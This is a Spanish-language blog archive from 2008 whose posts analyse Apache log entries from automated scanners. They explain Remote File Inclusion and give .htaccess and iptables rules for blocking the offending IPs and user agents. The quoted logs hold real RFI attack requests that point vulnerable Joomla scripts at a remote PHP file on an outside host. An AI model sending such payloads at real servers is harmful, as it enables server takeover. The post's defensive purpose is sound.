EntreBits » seguridad

Podcast EntreBits: Google Chome, Redes Sociales, Seguridad

Rodrigo — Sat, 06 Sep 2008 04:58:29 +0000

Seguridad: protegete de espías 2

Rodrigo — Tue, 22 Apr 2008 22:44:32 +0000

En el post anterior hablaba de intrusos que buscan detectar vulnerabilidades de algunos scripts.

Bueno pues veo que cada vez hay un mayor número de estas “herramientas” (para kiddies) que no hacen otra cosa que hacernos perder el tiempo.

Voy a dedicar una sección en este blog para hablar acerca de estas herramientas, pero primero, lo primero.

217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”
217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 303 “-” “Morfeus Fucking Scanner”

Como podrán ver en esos logs, hacen peticiones hacia archivos específicos. Por el nombre de los directorios se puede deducir claramente que los directorios que buscan pertenecen a la estructura de el CMS Joomla.

Deben de usar un scanner de ips, por que ni siquiera se tomaron la molestia de verificar si en este servidor hay Joomla instalado (no, no hay, ni lo habrá).

Algunos blogs recomiendan bannear ese user-agent “Morfeus Fucking Scanner”, lo cual si serviría temporalmente, ya que cambiando el user-agent del scanner se soluciona el asunto.

Para bloquear ese scanner por medio de su user-agent basta con agregar esto al .htaccess

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^Morfeus RewriteRule ^.*$ - [F]
Con estas líneas se le denegaría el acceso al user-agent, pero no a la ip.

Otros recomiendan devolverles el favor a los espías con estas líneas
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (^Morfeus) [NC] RewriteRule .* http://%{REMOTE_ADDR} [r=301,l]
Con las líneas anteriores se hace un forwarding a la misma ip de donde proviene el ataque. Pero al igual que con el código anterior, solo se le denegará el acceso al user-agent y no a la ip.

Yo recomiendo agregar reglas para banear las ips.
iptables -A INPUT -s LAIP -j DROP

Pero si no tenemos acceso a las iptables, también podremos bannear a los espías mediante el archivo .htaccess de la siguiente manera:

#Morfeus Fucking Hacker deny from 217.118.2.160

Se que es algo molesto andar editando el archivo cada vez que un nuevo espía se acerque a nosotros, pero es mejor que podemos hacer sino tenemos acceso para bannear desde iptables.

¿Pero que ganan exactamente los espías al encontrar lo que buscan?

Bueno pues pongamos atención a la siguiente línea:

217.118.2.160 – - [20/Apr/2008:18:03:37 -0500] “GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1″ 404 310 “-” “Morfeus Fucking Scanner”

Lo que buscan hacer se llama RFI (Remote File Inclusion) que consiste según wikipedia en:

Remote File Inclusion, traducido al español como Inclusión Remota de Archivos – vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().

En pocas palabras ellos cuelgan un archivo en otro servidor (En este caso http://dwlz2.dwlz2.com/~dwlz2/ice.txt) que tiene código PHP que permite al atacante tomar control sobre el servidor, o al menos, usar código PHP para construir scripts para funciones específicas (spam, defaces, craking, etc). Verdaderamente es de extrema importancia cuidarnos de este tipo de ataques, ya que muchas cosas se ven comprometidas (Incluso la Base de datos).

Seguridad: protegete de espías

Rodrigo — Wed, 16 Apr 2008 07:42:18 +0000

Ha sido una semana muy dura, mucho trabajo y muchas cosas pendientes por hacer.

Estaba revisando los logs de apache y vi unas cosas raras:

69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpMyAdmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpMyAdmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPMYADMIN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPMYADMIN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /pHpMyAdMiN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /pHpMyAdMiN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PhPmYaDmIn/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PhPmYaDmIn/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPMYadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /PHPMYadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpMYadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpMYadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpmyADMIN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:07 -0500] “GET /phpmyADMIN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /pmamy/main.php HTTP/1.0″ 404 291 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /pmamy/main.php HTTP/1.0″ 404 291 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /pma/main.php HTTP/1.0″ 404 289 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /pma/main.php HTTP/1.0″ 404 289 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /PMA/main.php HTTP/1.0″ 404 289 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /PMA/main.php HTTP/1.0″ 404 289 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /myadmin/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /myadmin/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /phpmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /phpmyadmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /MYADMIN/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /MYADMIN/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /phpMyAdmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /phpMyAdmin/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /MYadmin/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /MYadmin/main.php HTTP/1.0″ 404 293 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /PHPMYADMIN/main.php HTTP/1.0″ 404 296 “-” “-”
69.64.197.157 – - [15/Apr/2008:07:06:08 -0500] “GET /PHPMYADMIN/main.php HTTP/1.0″ 404 296 “-” “-”

Bueno a primera vista se ve que buscan vulnerabilidades del phpmyadmin, pero primero tienen que saber donde está (si es que está), intentaron con no menos de 100 nombres distintos de carpetas y archivos, así que mejor añadí una regla a las IPTABLES para bannear definitivamente esa ip

iptables -A INPUT -s 69.64.197.157 -j DROP

Bueno eso no fui lo único que vi en los logs, también andaba un scanner:

67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”
67.205.68.215 – - [15/Apr/2008:17:13:18 -0500] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 300 “-” “-”

Bueno investigando un poco veo que se trata de un scanner que busca vulnerabilidades bueno si ponen esa dirección en el navegador http://67.205.68.215/ verán que es un servidor con Plesk instalado (en plataforma windows por cierto) , bueno aplicando lo mismo agregue una regla para banear esa ip
iptables -A INPUT -s 67.205.68.215 -j DROP

Les sugiero que si ven en sus logs algo parecido a esto agreguen unas reglas para banear las ips “No bienvenidas”.